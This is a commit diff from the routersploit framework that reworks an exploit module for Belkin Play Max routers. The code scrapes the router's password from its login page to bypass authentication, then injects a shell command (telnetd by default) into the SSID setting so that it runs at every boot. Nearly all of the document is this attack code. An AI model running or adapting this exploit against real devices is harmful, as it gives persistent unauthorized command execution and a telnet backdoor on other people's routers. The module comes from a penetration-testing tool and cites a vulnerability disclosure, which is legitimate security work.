Skip to content

R
routersploit
Commit 485ceef5 by BigNerd95
Options

Minor fixes

parent 91222529
Showing with 23 additions and 24 deletions
routersploit/modules/exploits/belkin/play_max_prce.py
......@@ -17,10 +17,10 @@ class Exploit(exploits.Exploit):
If the target is vulnerable, you can run a bash command at every boot.
"""
__info__ = {
'name': 'Belkin Persistent Remote Command Execution',
'name': 'Belkin Play Max Persistent RCE',
'description': 'Module exploits Belkin SSID injection vuln, allowing to execute arbitrary command at every boot',
'authors': [
'BigNerd95 (Lorenzo Santina)', # vulnerability discovery and routersploit module
'BigNerd95 (Lorenzo Santina) https://github.com/bignerd95', # vulnerability discovery and routersploit module
],
'references': [
'https://bignerd95.blogspot.it/2017/02/belkin-play-max-persistent-remote.html',
......@@ -35,26 +35,12 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port')
cmd = exploits.Option('telnetd', 'Command to execute')
def check_auth_bypass(self):
url = "{}:{}/login.stm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
val = re.findall('password\s?=\s?"(.+?)"', response.text) # in some fw there are no spaces
if len(val):
return True # target vulnerable
return False # target is not vulnerable
def auth_bypass(self):
url = "{}:{}/login.stm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return
return False
val = re.findall('password\s?=\s?"(.+?)"', response.text) # in some fw there are no spaces
......@@ -64,20 +50,22 @@ class Exploit(exploits.Exploit):
login = http_request(method="POST", url=url, data=payload)
if login is None:
return
return False
error = re.search('loginpserr.stm', login.text)
if not error:
print_success("Exploit success, you are now logged in!")
return
return True
print_error("Exploit failed. Device seems to be not vulnerable.")
return False
def inject_command(self):
ssid_url = "{}:{}/wireless_id.stm".format(self.target, self.port)
response = http_request(method="GET", url=ssid_url)
if response is None:
print_error("Exploit failed. No response from target!")
return
srcSSID = re.search("document\.tF\['ssid'\]\.value=\"(.*)\";", response.text)
......@@ -85,7 +73,7 @@ class Exploit(exploits.Exploit):
SSID = srcSSID.group(1)
else:
print_error("Exploit failed. Are you logged in?")
exit(1)
return
if len(SSID) + 2 + len(self.cmd) > 32:
newlen = 32 - len(self.cmd) - 2
......@@ -99,6 +87,7 @@ class Exploit(exploits.Exploit):
response = http_request(method="POST", url=url, data=payload)
if response is None:
print_error("Exploit failed. No response from target!")
return
err = re.search('countdown\(55\);', response.text)
......@@ -106,12 +95,22 @@ class Exploit(exploits.Exploit):
print_success("Exploit success, wait until router reboot.")
else:
print_error("Exploit failed. Device seems to be not vulnerable.")
exit(1)
def run(self):
self.auth_bypass()
self.inject_command()
if self.auth_bypass():
self.inject_command()
@mute
def check(self):
return self.check_auth_bypass()
url = "{}:{}/login.stm".format(self.target, self.port)
response = http_request(method="GET", url=url)
if response is None:
return False # target is not vulnerable
val = re.findall('password\s?=\s?"(.+?)"', response.text) # in some fw there are no spaces
if len(val):
return True # target is vulnerable
return False # target is not vulnerable
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment